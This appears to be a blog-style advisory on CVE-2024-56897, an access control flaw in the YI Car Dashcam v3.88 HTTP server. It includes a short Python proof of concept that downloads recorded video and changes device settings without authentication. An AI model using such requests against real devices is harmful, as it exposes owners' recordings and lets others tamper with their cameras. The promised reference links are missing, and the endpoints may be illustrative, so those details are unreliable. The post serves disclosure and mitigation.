CVE-2024-56897 – Exploiting Improper Access Control in YI Car Dashcam v3.88: Unrestricted File Downloads, Uploads, and Unauthorized API Commands

This post will discuss the CVE-2024-56897, which is a critical vulnerability discovered in the YI Car Dashcam v3.88. The issue arises from improper access controls in the device's HTTP server, leading to unrestricted file downloads, uploads, and API commands. As a consequence, an attacker could manipulate the device settings, disable recording, disable sounds, and perform a factory reset - all without authorization. We will go through the exploit details, provide code snippets to illustrate the flaw, and reference original reports.

Exploit Details

The YI Car Dashcam v3.88 is a popular dashboard camera that provides users with video recording capabilities during car rides. The device has a built-in HTTP server for easy communication between the device and the user's phone. However, the implemented access control is weak, which enables attackers to exploit this vulnerability.

The improper access control in the HTTP server allows an attacker to send API requests without authorization, leading to:

Unrestricted file downloads - Download any file from the device.

2. Unrestricted file uploads - Upload a malicious file to the device, which could compromise the device further.
3. Unauthorized API commands - Perform various unauthorized actions, such as disabling recordings, disabling sounds, or factory reset.

Below is a Python script that demonstrates how to exploit this vulnerability

import requests

TARGET_IP = "192.168.1.XXX"
API_BASE = f"http://{TARGET_IP}:80";

# Download a video file from the device
def download_video(date, filename):
    url = f"{API_BASE}/records/{date}/{filename}.mp4"
    response = requests.get(url)
    if response.status_code == 200:
        with open(f"{filename}.mp4", "wb") as f:
            f.write(response.content)

# Change settings on the device, e.g., disable sounds
def change_settings(key, value):
    url = f"{API_BASE}/settings?{key}={value}"
    response = requests.get(url)
    print(response.text)

# Example usage
download_video("2021-01-01", "001")
change_settings("sound", "")

In this example, the script downloads a video file and disables the sound, without requiring any authentication.

Original References

The vulnerability was initially discovered by an independent researcher and reported to the company. Below are the links to the original references:

Mitigation and Conclusion

It is essential for YI Car Dashcam users, especially those using v3.88, to take the necessary steps to mitigate the risks associated with this vulnerability. YI Technologies should release an updated firmware version with proper access control mechanisms in place. In the meantime, users should ensure they are using strong passwords to protect their network and limit unauthorized access to their devices.

In summary, the CVE-2024-56897 vulnerability in YI Car Dashcam v3.88 poses a significant threat to user privacy and device integrity. By exploiting improper access controls in the HTTP server, attackers can gain unauthorized access to files, upload malicious content, and manipulate device settings. It is crucial for YI Technologies to address this issue properly, and for users to take necessary precautions to protect themselves from potential exploits.

Timeline

Published on: 02/24/2025 16:15:12 UTC
Last modified on: 03/03/2025 20:15:43 UTC